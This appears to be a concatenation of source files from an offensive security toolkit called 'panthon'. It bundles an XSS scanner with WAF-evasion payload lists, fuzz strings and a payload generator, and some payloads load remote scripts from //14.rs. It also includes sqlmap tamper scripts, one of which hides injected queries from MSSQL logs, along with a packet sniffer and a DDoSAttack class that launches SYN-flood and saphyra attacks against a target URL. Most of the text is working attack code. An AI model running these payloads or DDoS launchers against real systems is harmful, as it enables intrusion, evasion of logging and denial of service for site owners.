threadCount = 10  # default number of threads
timeout = 10  # default number of http request timeout

# attributes that have special properties
specialAttributes = ["srcdoc", "src"]

badTags = ("iframe", "title", "textarea", "noembed", "style", "template", "noscript")

tags = ("html", "d3v", "a", "details")  # HTML Tags

# "Things" that can be used between js functions and breakers e.g. '};alert()//
jFillings = ";"
# "Things" that can be used before > e.g. <tag attr=value%0dx>
lFillings = ("", "%0dx")
# "Things" to use between event handler and = or between function and =
eFillings = ("%09", "%0a", "%0d", "+")
fillings = ("%09", "%0a", "%0d", "/+/")  # "Things" to use instead of space

eventHandlers = {  # Event handlers and the tags compatible with them
    "ontoggle": ["details"],
    "onpointerenter": ["d3v", "details", "html", "a"],
    "onmouseover": ["a", "html", "d3v"],
}

functions = (  # JavaScript functions to get a popup
    "[8].find(confirm)",
    "confirm()",
    "(confirm)()",
    "co\u006efir\u006d()",
    "(prompt)``",
    "a=prompt,a()",
)

payloads = (  # Payloads for filter & WAF evasion
    "'\"</Script><Html Onmouseover=(confirm)()//<imG/sRc=l oNerrOr=(prompt)() x>",
    "<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>",
    "<deTails open oNToggle=confi\u0072m()>",
    "<img sRc=l oNerrOr=(confirm)() x>",
    '<svg/x=">"/onload=confirm()//',
    "<svg%0Aonload=%09((pro\u006dpt))()//",
    "<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>",
    "<sCript x>confirm``</scRipt x>",
    "<Script x>prompt()</scRiPt x>",
    "<sCriPt sRc=//14.rs>",
    "<embed//sRc=//14.rs>",
    "<base href=//14.rs/><script src=/>",
    "<object//data=//14.rs>",
    '<s=" onclick=confirm``>clickme',
    "<svG oNLoad=co\u006efirm&#x28;1&#x29>",
    "'\"><y///oNMousEDown=((confirm))()>Click",
    "<a/href=javascript&colon;co\u006efirm&#40;&quot;1&quot;&#41;>clickme</a>",
    "<img src=x onerror=confir\u006d`1`>",
    "<svg/onload=co\u006efir\u006d`1`>",
)

fuzzes = (  # Fuzz strings to test WAFs
    "<test",
    "<test//",
    "<test>",
    "<test x>",
    "<test x=y",
    "<test x=y//",
    "<test/oNxX=yYy//",
    "<test oNxX=yYy>",
    "<test onload=x",
    "<test/o%00nload=x",
    "<test sRc=xxx",
    "<test data=asa",
    "<test data=javascript:asa",
    "<svg x=y>",
    "<details x=y//",
    "<a href=x//",
    "<emBed x=y>",
    "<object x=y//",
    "<bGsOund sRc=x>",
    "<iSinDEx x=y//",
    "<aUdio x=y>",
    "<script x=y>",
    "<script//src=//",
    '">payload<br/attr="',
    '"-confirm``-"',
    "<test ONdBlcLicK=x>",
    "<test/oNcoNTeXtMenU=x>",
    "<test OndRAgOvEr=x>",
)

headers = {  # default headers
    "User-Agent": "$",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip,deflate",
    "Connection": "close",
    "DNT": "1",
    "Upgrade-Insecure-Requests": "1",
}

blindParams = [  # common paramtere names to be bruteforced for parameter discovery
    "redirect",
    "redir",
    "url",
    "link",
    "goto",
    "debug",
    "_debug",
    "test",
    "get",
    "index",
    "src",
    "source",
    "file",
    "frame",
    "config",
    "new",
    "old",
    "var",
    "rurl",
    "return_to",
    "_return",
    "returl",
    "last",
    "text",
    "load",
    "email",
    "mail",
    "user",
    "username",
    "password",
    "pass",
    "passwd",
    "first_name",
    "last_name",
    "back",
    "href",
    "ref",
    "data",
    "input",
    "out",
    "net",
    "host",
    "address",
    "code",
    "auth",
    "userid",
    "auth_token",
    "token",
    "error",
    "keyword",
    "key",
    "q",
    "query",
    "aid",
    "bid",
    "cid",
    "did",
    "eid",
    "fid",
    "gid",
    "hid",
    "iid",
    "jid",
    "kid",
    "lid",
    "mid",
    "nid",
    "oid",
    "pid",
    "qid",
    "rid",
    "sid",
    "tid",
    "uid",
    "vid",
    "wid",
    "xid",
    "yid",
    "zid",
    "cal",
    "country",
    "x",
    "y",
    "topic",
    "title",
    "head",
    "higher",
    "lower",
    "width",
    "height",
    "add",
    "result",
    "log",
    "demo",
    "example",
    "message",
]



import re

from core.config import xsschecker
from core.utils import stripper


def jsContexter(script):
    broken = script.split(xsschecker)
    pre = broken[0]
    #  remove everything that is between {..}, "..." or '...'
    pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', "", pre)
    breaker = ""
    num = 0
    for char in pre:  # iterate over the remaining characters
        if char == "{":
            breaker += "}"
        elif char == "(":
            breaker += (  # yes, it should be ); but we will invert the whole thing later
                ";)"
            )
        elif char == "[":
            breaker += "]"
        elif char == "/":
            try:
                if pre[num + 1] == "*":
                    breaker += "/*"
            except IndexError:
                pass
        elif (
            char == "}"
        ):  # we encountered a } so we will strip off "our }" because this one does the job
            breaker = stripper(breaker, "}")
        elif (
            char == ")"
        ):  # we encountered a ) so we will strip off "our }" because this one does the job
            breaker = stripper(breaker, ")")
        elif (
            breaker == "]"
        ):  # we encountered a ] so we will strip off "our }" because this one does the job
            breaker = stripper(breaker, "]")
        num += 1
    return breaker[::-1]  # invert the breaker string



import logging
import scapy.all as scapy
from threading import Thread
from queue import Queue
import time

logging.basicConfig(
    level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s"
)


class NetworkMonitor:
    def __init__(self, interface="eth0", timeout=60):
        self.interface = interface
        self.timeout = timeout
        self.queue = Queue()
        self.stop_sniff = False

    def packet_handler(self, packet):
        self.queue.put(packet)  # Put the packet in the queue for processing

    def start_sniffing(self):
        # Start sniffing in a separate thread to avoid blocking
        sniff_thread = Thread(target=self.sniff_packets)
        sniff_thread.start()
        return sniff_thread

    def sniff_packets(self):
        scapy.sniff(
            iface=self.interface,
            prn=self.packet_handler,
            store=False,
            timeout=self.timeout,
        )

    def stop_sniffing(self):
        self.stop_sniff = True
        logging.info("Stopping sniffing")

    def analyze_traffic(self):
        # This method could be enhanced to filter and analyze traffic more specifically
        packets = []
        while not self.queue.empty():
            packet = self.queue.get()
            packets.append(packet)
        return packets

    def run_monitor(self):
        self.stop_sniff = False
        sniff_thread = self.start_sniffing()
        start_time = time.time()

        while time.time() - start_time < self.timeout and not self.stop_sniff:
            time.sleep(1)

        self.stop_sniffing()
        sniff_thread.join()
        return self.analyze_traffic()



from core.config import (
    xsschecker,
    badTags,
    fillings,
    eFillings,
    lFillings,
    jFillings,
    eventHandlers,
    tags,
    functions,
)
from core.jsContexter import jsContexter
from core.utils import randomUpper as r, genGen, extractScripts


def generator(occurences, response):
    scripts = extractScripts(response)
    index = 0
    vectors = {
        11: set(),
        10: set(),
        9: set(),
        8: set(),
        7: set(),
        6: set(),
        5: set(),
        4: set(),
        3: set(),
        2: set(),
        1: set(),
    }
    for i in occurences:
        context = occurences[i]["context"]
        if context == "html":
            lessBracketEfficiency = occurences[i]["score"]["<"]
            greatBracketEfficiency = occurences[i]["score"][">"]
            ends = ["//"]
            badTag = (
                occurences[i]["details"]["badTag"]
                if "badTag" in occurences[i]["details"]
                else ""
            )
            if greatBracketEfficiency == 100:
                ends.append(">")
            if lessBracketEfficiency:
                payloads = genGen(
                    fillings,
                    eFillings,
                    lFillings,
                    eventHandlers,
                    tags,
                    functions,
                    ends,
                    badTag,
                )
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == "attribute":
            found = False
            tag = occurences[i]["details"]["tag"]
            Type = occurences[i]["details"]["type"]
            quote = occurences[i]["details"]["quote"] or ""
            attributeName = occurences[i]["details"]["name"]
            attributeValue = occurences[i]["details"]["value"]
            quoteEfficiency = (
                occurences[i]["score"][quote]
                if quote in occurences[i]["score"]
                else 100
            )
            greatBracketEfficiency = occurences[i]["score"][">"]
            ends = ["//"]
            if greatBracketEfficiency == 100:
                ends.append(">")
            if greatBracketEfficiency == 100 and quoteEfficiency == 100:
                payloads = genGen(
                    fillings, eFillings, lFillings, eventHandlers, tags, functions, ends
                )
                for payload in payloads:
                    payload = quote + ">" + payload
                    found = True
                    vectors[9].add(payload)
            if quoteEfficiency == 100:
                for filling in fillings:
                    for function in functions:
                        vector = (
                            quote
                            + filling
                            + r("autofocus")
                            + filling
                            + r("onfocus")
                            + "="
                            + quote
                            + function
                        )
                        found = True
                        vectors[8].add(vector)
            if quoteEfficiency == 90:
                for filling in fillings:
                    for function in functions:
                        vector = (
                            "\\"
                            + quote
                            + filling
                            + r("autofocus")
                            + filling
                            + r("onfocus")
                            + "="
                            + function
                            + filling
                            + "\\"
                            + quote
                        )
                        found = True
                        vectors[7].add(vector)
            if Type == "value":
                if attributeName == "srcdoc":
                    if occurences[i]["score"]["&lt;"]:
                        if occurences[i]["score"]["&gt;"]:
                            del ends[:]
                            ends.append("%26gt;")
                        payloads = genGen(
                            fillings,
                            eFillings,
                            lFillings,
                            eventHandlers,
                            tags,
                            functions,
                            ends,
                        )
                        for payload in payloads:
                            found = True
                            vectors[9].add(payload.replace("<", "%26lt;"))
                elif attributeName == "href" and attributeValue == xsschecker:
                    for function in functions:
                        found = True
                        vectors[10].add(r("javascript:") + function)
                elif attributeName.startswith("on"):
                    closer = jsContexter(attributeValue)
                    quote = ""
                    for char in attributeValue.split(xsschecker)[1]:
                        if char in ["'", '"', "`"]:
                            quote = char
                            break
                    suffix = "//\\"
                    for filling in jFillings:
                        for function in functions:
                            vector = quote + closer + filling + function + suffix
                            if found:
                                vectors[7].add(vector)
                            else:
                                vectors[9].add(vector)
                    if quoteEfficiency > 83:
                        suffix = "//"
                        for filling in jFillings:
                            for function in functions:
                                if "=" in function:
                                    function = "(" + function + ")"
                                if quote == "":
                                    filling = ""
                                vector = (
                                    "\\" + quote + closer + filling + function + suffix
                                )
                                if found:
                                    vectors[7].add(vector)
                                else:
                                    vectors[9].add(vector)
                elif tag in ("script", "iframe", "embed", "object"):
                    if (
                        attributeName in ("src", "iframe", "embed")
                        and attributeValue == xsschecker
                    ):
                        payloads = ["//15.rs", "\\/\\\\\\/\\15.rs"]
                        for payload in payloads:
                            vectors[10].add(payload)
                    elif (
                        tag == "object"
                        and attributeName == "data"
                        and attributeValue == xsschecker
                    ):
                        for function in functions:
                            found = True
                            vectors[10].add(r("javascript:") + function)
                    elif quoteEfficiency == greatBracketEfficiency == 100:
                        payloads = genGen(
                            fillings,
                            eFillings,
                            lFillings,
                            eventHandlers,
                            tags,
                            functions,
                            ends,
                        )
                        for payload in payloads:
                            payload = quote + ">" + r("</script/>") + payload
                            found = True
                            vectors[11].add(payload)
        elif context == "comment":
            lessBracketEfficiency = occurences[i]["score"]["<"]
            greatBracketEfficiency = occurences[i]["score"][">"]
            ends = ["//"]
            if greatBracketEfficiency == 100:
                ends.append(">")
            if lessBracketEfficiency == 100:
                payloads = genGen(
                    fillings, eFillings, lFillings, eventHandlers, tags, functions, ends
                )
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == "script":
            if scripts:
                try:
                    script = scripts[index]
                except IndexError:
                    script = scripts[0]
            else:
                continue
            closer = jsContexter(script)
            quote = occurences[i]["details"]["quote"]
            scriptEfficiency = occurences[i]["score"]["</scRipT/>"]
            greatBracketEfficiency = occurences[i]["score"][">"]
            breakerEfficiency = 100
            if quote:
                breakerEfficiency = occurences[i]["score"][quote]
            ends = ["//"]
            if greatBracketEfficiency == 100:
                ends.append(">")
            if scriptEfficiency == 100:
                r("</script/>")
                payloads = genGen(
                    fillings, eFillings, lFillings, eventHandlers, tags, functions, ends
                )
                for payload in payloads:
                    vectors[10].add(payload)
            if closer:
                suffix = "//\\"
                for filling in jFillings:
                    for function in functions:
                        vector = quote + closer + filling + function + suffix
                        vectors[7].add(vector)
            elif breakerEfficiency > 83:
                prefix = ""
                suffix = "//"
                if breakerEfficiency != 100:
                    prefix = "\\"
                for filling in jFillings:
                    for function in functions:
                        if "=" in function:
                            function = "(" + function + ")"
                        if quote == "":
                            filling = ""
                        vector = prefix + quote + closer + filling + function + suffix
                        vectors[6].add(vector)
            index += 1
    return vectors



import time


def debug(string):
    """Output a dark blue debug string."""
    timer = time.strftime("%H:%M:%S")
    print("\033[36m[debug]\033[0m[{}] {}".format(timer, string))


def info(string):
    """Output a light green information string."""
    timer = time.strftime("%H:%M:%S")
    print("\033[1m\033[92m[info][{}]\033[0m {}".format(timer, string))


def warning(string):
    """Output a dark yellow warning string."""
    timer = time.strftime("%H:%M:%S")
    print("\033[33m[warning][{}]\033[0m {}".format(timer, string))


def error(string):
    """Output a red error string."""
    timer = time.strftime("%H:%M:%S")
    print("\033[91m[error][{}]\033[0m {}".format(timer, string))



import random


__PRIORITY__ = 9


def tamper(script):
    retval = []
    for c in script:
        do_replace = random.randint(1, 2) == 1
        if do_replace:
            c = c.upper()
        retval.append(c)
    return "".join(retval)



import copy
from urllib.parse import urlparse, unquote

from core.checker import checker
from core.colors import end, green, que
import core.config
from core.config import xsschecker, minEfficiency
from core.dom import dom
from core.filterChecker import filterChecker
from core.generator import generator
from core.htmlParser import htmlParser
from core.requester import requester
from core.utils import getUrl, getParams, getVar
from core.wafDetector import wafDetector
from core.log import setup_logger

logger = setup_logger(__name__)


def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip):
    GET, POST = (False, True) if paramData else (True, False)
    # If the user hasn't supplied the root url with http(s), we will handle it
    if not target.startswith("http"):
        try:
            response = requester("https://" + target, {}, headers, GET, delay, timeout)
            target = "https://" + target
        except:
            target = "http://" + target
    logger.debug("Scan target: {}".format(target))
    response = requester(target, {}, headers, GET, delay, timeout).text

    if not skipDOM:
        logger.run("Checking for DOM vulnerabilities")
        highlighted = dom(response)
        if highlighted:
            logger.good("Potentially vulnerable objects found")
            logger.red_line(level="good")
            for line in highlighted:
                logger.no_format(line, level="good")
            logger.red_line(level="good")
    host = urlparse(target).netloc  # Extracts host out of the url
    logger.debug("Host to scan: {}".format(host))
    url = getUrl(target, GET)
    logger.debug("Url to scan: {}".format(url))
    params = getParams(target, paramData, GET)
    logger.debug_json("Scan parameters:", params)
    if not params:
        logger.error("No parameters to test.")
        quit()
    WAF = wafDetector(
        url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout
    )
    if WAF:
        logger.error("WAF detected: %s%s%s" % (green, WAF, end))
    else:
        logger.good("WAF Status: %sOffline%s" % (green, end))

    for paramName in params.keys():
        paramsCopy = copy.deepcopy(params)
        logger.info("Testing parameter: %s" % paramName)
        if encoding:
            paramsCopy[paramName] = encoding(xsschecker)
        else:
            paramsCopy[paramName] = xsschecker
        response = requester(url, paramsCopy, headers, GET, delay, timeout)
        occurences = htmlParser(response, encoding)
        positions = occurences.keys()
        logger.debug("Scan occurences: {}".format(occurences))
        if not occurences:
            logger.error("No reflection found")
            continue
        else:
            logger.info("Reflections found: %i" % len(occurences))

        logger.run("Analysing reflections")
        efficiencies = filterChecker(
            url, paramsCopy, headers, GET, delay, occurences, timeout, encoding
        )
        logger.debug("Scan efficiencies: {}".format(efficiencies))
        logger.run("Generating payloads")
        vectors = generator(occurences, response.text)
        total = 0
        for v in vectors.values():
            total += len(v)
        if total == 0:
            logger.error("No vectors were crafted.")
            continue
        logger.info("Payloads generated: %i" % total)
        progress = 0
        for confidence, vects in vectors.items():
            for vect in vects:
                if core.config.globalVariables["path"]:
                    vect = vect.replace("/", "%2F")
                loggerVector = vect
                progress += 1
                logger.run("Progress: %i/%i\r" % (progress, total))
                if not GET:
                    vect = unquote(vect)
                efficiencies = checker(
                    url,
                    paramsCopy,
                    headers,
                    GET,
                    delay,
                    vect,
                    positions,
                    timeout,
                    encoding,
                )
                if not efficiencies:
                    for i in range(len(occurences)):
                        efficiencies.append(0)
                bestEfficiency = max(efficiencies)
                if bestEfficiency == 100 or (vect[0] == "\\" and bestEfficiency >= 95):
                    logger.red_line()
                    logger.good("Payload: %s" % loggerVector)
                    logger.info("Efficiency: %i" % bestEfficiency)
                    logger.info("Confidence: %i" % confidence)
                    if not skip:
                        choice = input(
                            "%s Would you like to continue scanning? [y/N] " % que
                        ).lower()
                        if choice != "y":
                            quit()
                elif bestEfficiency > minEfficiency:
                    logger.red_line()
                    logger.good("Payload: %s" % loggerVector)
                    logger.info("Efficiency: %i" % bestEfficiency)
                    logger.info("Confidence: %i" % confidence)
        logger.no_format("")



import re

from core.colors import end, red, yellow

if len(end) < 1:
    end = red = yellow = "*"


def dom(response):
    highlighted = []
    sources = r"""\b(?:document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)(local|session)Storage)\b"""
    sinks = r"""\b(?:eval|evaluate|execCommand|assign|navigate|getResponseHeaderopen|showModalDialog|Function|set(Timeout|Interval|Immediate)|execScript|crypto.generateCRMFRequest|ScriptElement\.(src|text|textContent|innerText)|.*?\.onEventName|document\.(write|writeln)|.*?\.innerHTML|Range\.createContextualFragment|(document|window)\.location)\b"""
    scripts = re.findall(r"(?i)(?s)<script[^>]*>(.*?)</script>", response)
    sinkFound, sourceFound = False, False
    for script in scripts:
        script = script.split("\n")
        num = 1
        allControlledVariables = set()
        try:
            for newLine in script:
                line = newLine
                parts = line.split("var ")
                controlledVariables = set()
                if len(parts) > 1:
                    for part in parts:
                        for controlledVariable in allControlledVariables:
                            if controlledVariable in part:
                                controlledVariables.add(
                                    re.search(r"[a-zA-Z$_][a-zA-Z0-9$_]+", part)
                                    .group()
                                    .replace("$", "\$")
                                )
                pattern = re.finditer(sources, newLine)
                for grp in pattern:
                    if grp:
                        source = newLine[grp.start() : grp.end()].replace(" ", "")
                        if source:
                            if len(parts) > 1:
                                for part in parts:
                                    if source in part:
                                        controlledVariables.add(
                                            re.search(r"[a-zA-Z$_][a-zA-Z0-9$_]+", part)
                                            .group()
                                            .replace("$", "\$")
                                        )
                            line = line.replace(source, yellow + source + end)
                for controlledVariable in controlledVariables:
                    allControlledVariables.add(controlledVariable)
                for controlledVariable in allControlledVariables:
                    matches = list(
                        filter(None, re.findall(r"\b%s\b" % controlledVariable, line))
                    )
                    if matches:
                        sourceFound = True
                        line = re.sub(
                            r"\b%s\b" % controlledVariable,
                            yellow + controlledVariable + end,
                            line,
                        )
                pattern = re.finditer(sinks, newLine)
                for grp in pattern:
                    if grp:
                        sink = newLine[grp.start() : grp.end()].replace(" ", "")
                        if sink:
                            line = line.replace(sink, red + sink + end)
                            sinkFound = True
                if line != newLine:
                    highlighted.append("%-3s %s" % (str(num), line.lstrip(" ")))
                num += 1
        except MemoryError:
            pass
    if sinkFound or sourceFound:
        return highlighted
    else:
        return []



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from plugins.generic.takeover import Takeover as GenericTakeover


class Takeover(GenericTakeover):
    def __init__(self):
        self.__basedir = None
        self.__datadir = None

        GenericTakeover.__init__(self)



import random


__PRIORITY__ = 8


def tamper(script):
    retval = ""
    for c in script:
        do_it = random.randint(1, 3) == 1
        if do_it:
            if c == "(":
                c = "(("
            elif c == ")":
                c = "))"
        retval += c
    return retval



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def tamper(payload, **kwargs):
    """Appends (MsSQL) function 'sp_password' to the end of the payload for
    automatic obfuscation from DBMS logs.

    Requirement:
        * MSSQL

    Notes:
        * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
        * Reference: http://websec.ca/kb/sql_injection

    >>> tamper('1 AND 9227=9227-- ')
    '1 AND 9227=9227-- sp_password'
    """

    retVal = ""

    if payload:
        retVal = "%s%ssp_password" % (
            payload,
            "-- " if not any(_ if _ in payload else None for _ in ("#", "-- ")) else "",
        )

    return retVal



import setuptools
from setuptools import setup
from pathlib import Path

this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text(encoding="utf-8")

def _strip(line):
    return line.split(" ")[0].split("#")[0].split(",")[0]

setup(
    name="panthon",
    version="0.2.4",
    author="Nripesh",
    author_email="Nripesh14@gmail.com",
    description=(
        "Panthon employs sophisticated methods to replicate different cyber threats,"
        " offering a dynamic solution to proactively address the constantly shifting"
        " realm of cybersecurity risks. Our goal is to help build more resilient and"
        " secure systems through a deeper understanding and anticipation of potential"
        " vulnerabilities."
    ),
    long_description=long_description,
    long_description_content_type="text/markdown",
    include_package_data=True,
    packages=setuptools.find_packages(),
    package_data={'panthon': ['*']},
    install_requires=[
        _strip(line) for line in open("requirements.txt", "r", encoding="utf-8").readlines()
    ],
    classifiers=[
        "License :: OSI Approved :: Apache Software License",
    ],
    license="Apache Software License",
)



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import re

from xml.sax.handler import ContentHandler

from lib.core.common import sanitizeStr


class FingerprintHandler(ContentHandler):
    """This class defines methods to parse and extract information from the
    given DBMS banner based upon the data in XML file."""

    def __init__(self, banner, info):
        ContentHandler.__init__(self)

        self._banner = sanitizeStr(banner or "")
        self._regexp = None
        self._match = None
        self._dbmsVersion = None
        self._techVersion = None
        self._info = info

    def _feedInfo(self, key, value):
        value = sanitizeStr(value)

        if value in (None, "None", ""):
            return

        if key == "dbmsVersion":
            self._info[key] = value
        else:
            if key not in self._info:
                self._info[key] = set()

            for _ in value.split("|"):
                self._info[key].add(_)

    def startElement(self, name, attrs):
        if name == "regexp":
            self._regexp = sanitizeStr(attrs.get("value"))
            _ = re.match(
                r"\A[A-Za-z0-9]+", self._regexp
            )  # minor trick avoiding compiling of large amount of regexes

            if (
                _
                and self._banner
                and _.group(0).lower() in self._banner.lower()
                or not _
            ):
                self._match = re.search(self._regexp, self._banner, re.I | re.M)
            else:
                self._match = None

        if name == "info" and self._match:
            self._feedInfo("type", attrs.get("type"))
            self._feedInfo("distrib", attrs.get("distrib"))
            self._feedInfo("release", attrs.get("release"))
            self._feedInfo("codename", attrs.get("codename"))

            self._dbmsVersion = sanitizeStr(attrs.get("dbms_version"))
            self._techVersion = sanitizeStr(attrs.get("tech_version"))
            self._sp = sanitizeStr(attrs.get("sp"))

            if self._dbmsVersion and self._dbmsVersion.isdigit():
                self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion)))

            if self._techVersion and self._techVersion.isdigit():
                self._feedInfo(
                    "technology",
                    "%s %s"
                    % (
                        attrs.get("technology"),
                        self._match.group(int(self._techVersion)),
                    ),
                )
            else:
                self._feedInfo("technology", attrs.get("technology"))

            if self._sp.isdigit():
                self._feedInfo("sp", "Service Pack %s" % int(self._sp))

            self._regexp = None
            self._match = None
            self._dbmsVersion = None
            self._techVersion = None



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    singleTimeWarnMessage(
        "tamper script '%s' is only meant to be run against %s"
        % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE)
    )


def tamper(payload, **kwargs):
    """Replaces instances of <int> UNION with <int>DUNION.

    Requirement:
        * Oracle

    Notes:
        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

    >>> tamper('1 UNION ALL SELECT')
    '1DUNION ALL SELECT'
    """

    return (
        re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload
    )



import copy
from random import randint
from time import sleep
from urllib.parse import unquote

from core.colors import end, red, green, yellow
from core.config import fuzzes, xsschecker
from core.requester import requester
from core.utils import replaceValue, counter
from core.log import setup_logger

logger = setup_logger(__name__)


def fuzzer(url, params, headers, GET, delay, timeout, WAF, encoding):
    for fuzz in fuzzes:
        if delay == 0:
            delay = 0
        t = delay + randint(delay, delay * 2) + counter(fuzz)
        sleep(t)
        try:
            if encoding:
                fuzz = encoding(unquote(fuzz))
            data = replaceValue(params, xsschecker, fuzz, copy.deepcopy)
            response = requester(url, data, headers, GET, delay / 2, timeout)
        except:
            logger.error("WAF is dropping suspicious requests.")
            if delay == 0:
                logger.info("Delay has been increased to %s6%s seconds." % (green, end))
                delay += 6
            limit = (delay + 1) * 50
            timer = -1
            while timer < limit:
                logger.info(
                    "\rFuzzing will continue after %s%i%s seconds.\t\t\r"
                    % (green, limit, end)
                )
                limit -= 1
                sleep(1)
            try:
                requester(url, params, headers, GET, 0, 10)
                logger.good(
                    "Pheww! Looks like sleeping for %s%i%s seconds worked!"
                    % (green, ((delay + 1) * 2), end)
                )
            except:
                logger.error("\nLooks like WAF has blocked our IP Address. Sorry!")
                break
        if encoding:
            fuzz = encoding(fuzz)
        if (
            fuzz.lower() in response.text.lower()
        ):  # if fuzz string is reflected in the response
            result = "%s[passed]  %s" % (green, end)
        # if the server returned an error (Maybe WAF blocked it)
        elif str(response.status_code)[:1] != "2":
            result = "%s[blocked] %s" % (red, end)
        else:  # if the fuzz string was not reflected in the response completely
            result = "%s[filtered]%s" % (yellow, end)
        logger.info("%s %s" % (result, fuzz))



import sys
import os
import platform

colors = True  # Output should be colored
machine = sys.platform  # Detecting the os of current system
checkplatform = platform.platform()  # Get current version of OS
if machine.lower().startswith(("os", "win", "darwin", "ios")):
    colors = False  # Colors shouldn't be displayed on mac & windows
if (
    checkplatform.startswith("Windows-10")
    and int(platform.version().split(".")[2]) >= 10586
):
    colors = True
    os.system("")  # Enables the ANSI
if not colors:
    end = red = white = green = yellow = run = bad = good = info = que = ""
else:
    white = "\033[97m"
    green = "\033[92m"
    red = "\033[91m"
    yellow = "\033[93m"
    end = "\033[0m"
    back = "\033[7;91m"
    info = "\033[93m[!]\033[0m"
    que = "\033[94m[?]\033[0m"
    bad = "\033[91m[-]\033[0m"
    good = "\033[92m[+]\033[0m"
    run = "\033[97m[~]\033[0m"



import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

class WebsiteExtractor:
    def __init__(self, url):
        self.base_url = url
        self.assets = {
            'scripts': [],
            'stylesheets': [],
            'images': [],
            'others': []
        }

    def get_html(self):
        try:
            response = requests.get(self.base_url)
            response.raise_for_status()  # Raises an HTTPError for bad responses
            return response.text
        except requests.RequestException as e:
            print(f"Error fetching {self.base_url}: {e}")
            return None

    def extract_assets(self, html):
        soup = BeautifulSoup(html, 'html.parser')
        for script in soup.find_all("script"):
            src = script.get('src')
            if src:
                full_url = urljoin(self.base_url, src)
                self.assets['scripts'].append(full_url)
        
        for link in soup.find_all("link", rel="stylesheet"):
            href = link.get('href')
            if href:
                full_url = urljoin(self.base_url, href)
                self.assets['stylesheets'].append(full_url)
        
        for img in soup.find_all("img"):
            src = img.get('src')
            if src:
                full_url = urljoin(self.base_url, src)
                self.assets['images'].append(full_url)

        return self.assets

    def download_asset(self, url):
        try:
            response = requests.get(url)
            response.raise_for_status()
            return response.content  # returns bytes
        except requests.RequestException as e:
            print(f"Error downloading {url}: {e}")
            return None

    def fetch_website_assets(self):
        html = self.get_html()
        if html is not None:
            assets = self.extract_assets(html)
            asset_contents = {}
            for category in assets:
                for asset_url in assets[category]:
                    content = self.download_asset(asset_url)
                    asset_contents[asset_url] = content
            return asset_contents
        else:
            return {}

# Example usage:
if __name__ == "__main__":
    url = "https://www.wolframalpha.com"  # Change this URL to the website you want to extract
    extractor = WebsiteExtractor(url)
    assets_content = extractor.fetch_website_assets()
    for asset_url, content in assets_content.items():
        print(f"Content of {asset_url}: {content[:100]}..." if content else f"Failed to download {asset_url}")



import logging
import os
import subprocess
import sys
import platform
from urllib.parse import urlparse
import socket


logging.basicConfig(
    level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s"
)


class DDoSAttack:
    def aSYNcrone_attack(self, target_url, target_port, num_connections=10000):
        platform_type = self.detect_platform()

        if platform_type:
            parsed_url = urlparse(target_url)
            hostname = parsed_url.netloc
            ip = socket.gethostbyname(hostname)
            command = [
                platform_type,
                "80",
                ip,
                str(target_port),
                str(num_connections),
            ]
            try:
                subprocess.run(command)
            except subprocess.CalledProcessError as e:
                logging.error(f"Error while running aSYNcrone: {e}")
                return

    def saphyra_attack(self, target_url):
        command = [
            "python3",
            os.path.join(os.path.dirname(__file__), "DDOS/saphyra.py"),
            target_url,
        ]
        try:
            subprocess.run(command)
        except subprocess.CalledProcessError as e:
            logging.error(f"Error while running saphyra: {e}")
            return

    def detect_platform(self):
        if sys.platform == "darwin" and platform.machine() == "arm64":
            return os.path.join(
                os.path.dirname(__file__), "DDOS/aSYNcrone/aSYNcronemacARM"
            )
        elif sys.platform == "darwin":
            return os.path.join(
                os.path.dirname(__file__), "DDOS/aSYNcrone/aSYNcronemac"
            )
        elif sys.platform == "linux":
            return os.path.join(os.path.dirname(__file__), "DDOS/aSYNcrone/aSYNcrone")
        else:
            logging.error(f"Unknown platform: {sys.platform}")
            return None
